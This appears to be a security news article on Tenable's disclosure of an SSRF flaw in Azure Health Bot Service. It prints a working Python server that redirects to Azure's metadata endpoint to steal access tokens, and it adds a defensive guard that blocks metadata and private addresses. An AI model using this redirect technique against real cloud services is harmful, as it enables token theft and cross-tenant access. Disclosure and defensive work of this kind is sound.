Tenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.
The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.
These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.
Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.
This vulnerability let them bypass the service's existing filters and reach sensitive internal endpoints, such as Azure's Instance Metadata Service (IMDS).
Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection that pointed at an external host controlled by the attacker.
That host answered with a 301 redirect to the IMDS endpoint, which the service followed, so the researchers received a valid metadata response. From there they obtained an access token for management.azure.com and used it to list subscriptions and resources belonging to other customers.
The Tenable researchers used a short Python script as the HTTP server that performed the redirect in the SSRF attack:
#!/usr/bin/python3
# Redirect server used for the SSRF: every GET is answered with a 301 pointing
# at Azure IMDS, so a client that follows redirects ends up fetching the
# instance metadata instead of the "external" data source it was configured for.
from http.server import HTTPServer, BaseHTTPRequestHandler


def servePage(s, hverb):
    s.protocol_version = 'HTTP/1.1'
    # Spoof the Server header so the host looks like an ordinary IIS box.
    s.server_version = 'Microsoft-IIS/8.5'
    s.sys_version = ''
    s.send_response(301)
    s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
    # Content-Length added so HTTP/1.1 clients do not wait for a body that never comes.
    s.send_header('Content-Length', '0')
    s.end_headers()
    message = ""
    s.wfile.write(bytes(message, "utf8"))
    return


class StaticServer(BaseHTTPRequestHandler):
    def do_GET(self):
        servePage(self, "GET")
        return


def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
    # Bind on all interfaces; port 80 needs root or a capability on most systems.
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    httpd.serve_forever()


main()
In practice, an attacker configures a data connection in the service's scenario editor that targets a host under their control.
That host answers every request with a 301 redirect to Azure's IMDS. Because the service validated only the URL it was given and then followed the redirect, the attacker receives a valid metadata response and, from there, an access token for management.azure.com.
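The root cause above is a filter that checks the configured URL once and then follows whatever redirect comes back. The following is an added example (not Tenable's or Microsoft's code) of a redirect-aware guard for outbound data-connection fetches: every hop, including the initial URL, is resolved and checked against IMDS, link-local, loopback, private and other non-public ranges before it is requested. The hostnames attacker.example and fhir.example, the DNS table and the fake transport are constructed for the example so it runs offline; the redirect target is the same IMDS URL used in the article's script.

```python
#!/usr/bin/env python3
"""Redirect-aware SSRF guard (added example, not the service's own code)."""
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

IMDS_IP = ipaddress.ip_address("169.254.169.254")
CGNAT = ipaddress.ip_network("100.64.0.0/10")
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5


class SSRFBlocked(Exception):
    """Raised when any hop of a fetch would reach a forbidden destination."""


def is_blocked_ip(addr):
    """True if addr is IMDS or any non-public range. Accepts a str or ip object."""
    ip = ipaddress.ip_address(str(addr))
    # ::ffff:169.254.169.254 is a classic filter bypass: judge the embedded IPv4.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip == IMDS_IP or ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or (ip.version == 4 and ip in CGNAT))


def system_resolver(host):
    """Resolve with the OS resolver; IP literals pass straight through."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    return [ipaddress.ip_address(info[4][0].split("%")[0])
            for info in socket.getaddrinfo(host, None)]


def make_table_resolver(table):
    """Resolver backed by {hostname: [ip, ...]} so the example runs offline."""
    def resolve(host):
        try:
            return [ipaddress.ip_address(host)]
        except ValueError:
            pass
        if host not in table:
            raise OSError("NXDOMAIN " + host)
        return [ipaddress.ip_address(a) for a in table[host]]
    return resolve


def validate_target(url, resolver=system_resolver):
    """Return (ok, reason). Every address the host resolves to must be public."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = resolver(host)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    if not addrs:
        return False, "host resolved to no addresses"
    for ip in addrs:
        if is_blocked_ip(ip):
            return False, f"{host} resolves to blocked address {ip}"
    return True, "ok"


def fetch_with_guard(url, transport, resolver=system_resolver, max_redirects=MAX_REDIRECTS):
    """Follow redirects by hand so each hop is validated before it is requested.

    transport(url) -> (status, headers_dict, body).
    """
    for hop in range(max_redirects + 1):
        ok, reason = validate_target(url, resolver)
        if not ok:
            raise SSRFBlocked(f"hop {hop} {url}: {reason}")
        status, headers, body = transport(url)
        if status not in REDIRECT_CODES:
            return status, body
        location = headers.get("Location")
        if not location:
            raise SSRFBlocked(f"hop {hop} {url}: redirect without Location")
        url = urljoin(url, location)  # relative Location resolves against current URL
    raise SSRFBlocked(f"more than {max_redirects} redirects")


# Constructed DNS table and network (not real hosts). The attacker host mirrors
# the article: a public address that answers 301 -> IMDS.
FAKE_DNS = {"attacker.example": ["93.184.216.34"], "fhir.example": ["93.184.216.34"]}
FAKE_NETWORK = {
    "http://attacker.example/": (301, {"Location":
        "http://169.254.169.254/metadata/instance?api-version=2021-12-13"}, b""),
    "https://fhir.example/metadata": (200, {}, b'{"resourceType":"CapabilityStatement"}'),
}


def fake_transport(url):
    return FAKE_NETWORK.get(url, (404, {}, b""))


def demo():
    """Run both constructed targets through the guard; returns {url: outcome}."""
    resolver = make_table_resolver(FAKE_DNS)
    results = {}
    for url in FAKE_NETWORK:
        try:
            status, _ = fetch_with_guard(url, fake_transport, resolver)
            results[url] = ("allowed", status)
        except SSRFBlocked as exc:
            results[url] = ("blocked", str(exc))
    return results


if __name__ == "__main__":
    for url, outcome in demo().items():
        print(url, "->", outcome)
```

Running it, the FHIR-style target is allowed and the attacker host is allowed on hop 0 but blocked on hop 1 when its redirect lands on 169.254.169.254. One caveat a real deployment must handle: validating and then fetching by hostname leaves a resolve-then-connect window (DNS rebinding), so the production client should connect to the exact IP that passed validation, and the same check must run inside any other place the service fetches user-supplied URLs, such as the FHIR endpoint validator mentioned later in this article.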
Response and Mitigation
Upon discovering the vulnerabilities, Tenable immediately reported them to Microsoft’s Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the report and began implementing fixes.
By July 2, Microsoft confirmed that all affected services and regions had been patched, with no customer action required.
Tenable later identified another vulnerable endpoint, used to validate data connections to FHIR endpoints. Although it was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes implemented by July 12.
These vulnerabilities underscore the importance of robust web application and cloud security controls, even in AI-powered services.
While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.